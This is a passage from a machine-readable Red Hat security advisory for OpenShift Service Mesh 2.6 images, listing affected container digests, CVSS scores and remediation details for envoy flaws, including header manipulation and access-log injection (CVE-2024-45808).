"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Potential to manipulate `x-envoy` headers from external sources"
},
{
"cve": "CVE-2024-45808",
"cwe": {
"id": "CWE-117",
"name": "Improper Output Neutralization for Logs"
},
"discovery_date": "2024-09-20T00:40:26.266584+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313685"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in envoy. Affected versions of envoy may allow malicious attackers to inject unexpected content into access logs. This is achieved by exploiting the lack of validation for the `REQUESTED_SERVER_NAME` field for access loggers.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Malicious log injection via access logs",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in Envoy that allows attackers to inject unexpected content into access logs is classified as moderate severity rather than important because the impact is primarily related to log integrity rather than direct exploitation of the system or data breaches, which lowers the overall risk profile. While log tampering can lead to misleading information, it does not directly compromise the application\u2019s functionality or security boundaries. Additionally, the attack requires specific conditions to succeed, relying on the lack of validation for the `REQUESTED_SERVER_NAME` field, which may not be present in all configurations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45808"
},
{
"category": "external",
"summary": "RHBZ#2313685",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313685"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45808"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45808",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45808"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc"
}
],
"release_date": "2024-09-20T00:15:02.733000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
